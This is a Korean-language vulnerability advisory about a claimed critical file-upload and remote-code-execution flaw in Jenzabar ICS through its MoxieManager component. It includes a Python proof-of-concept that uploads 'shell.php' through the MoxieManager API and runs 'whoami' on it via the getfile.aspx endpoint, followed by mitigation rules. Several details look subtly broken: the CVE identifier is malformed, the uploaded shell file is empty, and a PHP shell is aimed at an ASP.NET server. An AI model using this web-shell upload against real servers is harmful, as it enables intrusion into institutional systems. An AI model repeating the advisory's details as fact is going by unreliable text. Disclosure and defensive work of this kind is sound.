
CVE-2026-30-03 9.8 (치명적) Jenzabar ICS + MoxieManager 잠재적 RCE
CVE-2026-30-03 9.8 (치명적) Jenzabar ICS + MoxieManager 잠재적 RCE
proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be
CVE CVSS 영향 영향 대상 CVE-2026-30-03 9.8 (치명적) 잠재적 RCE Jenzabar ICS + MoxieManager
Jenzabar ICS 시스템에서 사용되는 MoxieManager 구성 요소의 취약점으로 인해 파일 업로드가 부적절하게 처리될 수 있으며, 특정 조건에서 해당 파일이 공개적으로 접근 가능해져 잠재적으로 원격 코드 실행(RCE)으로 이어질 수 있습니다. 기술 설명
문제는 다음으로 인해 발생합니다:
업로드된 파일에 대한 적절한 검증 부족
공개 엔드포인트를 통한 파일 노출 가능성:
/ICS/staticpages/getfile.aspx
엔드포인트의 인증 제어 불일치:
/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx
특정 시나리오에서 업로드된 파일은 접근 가능한 디렉터리에 저장된 후 검색될 수 있습니다.
영향 임의 파일 업로드 민감한 콘텐츠 노출 잠재적 원격 코드 실행(서버 구성에 따라 다름) 시스템 전체 손상
분류 CVSS v3.1: 9.8 (치명적) 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434: 제한 없는 파일 업로드 CWE-284: 부적절한 접근 제어
PoC 익스플로잇
#!/usr/bin/env python3
import requests
TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"
files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}
r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")
SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)
영향을 받는 시스템 (33개 이상 확인됨)
수정 방법 즉시 조치 (완화):
DELETE /moxiemanager/files/users/*/shell.php
getfile.aspx 제한:
RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]
MoxieManager 업로드 비활성화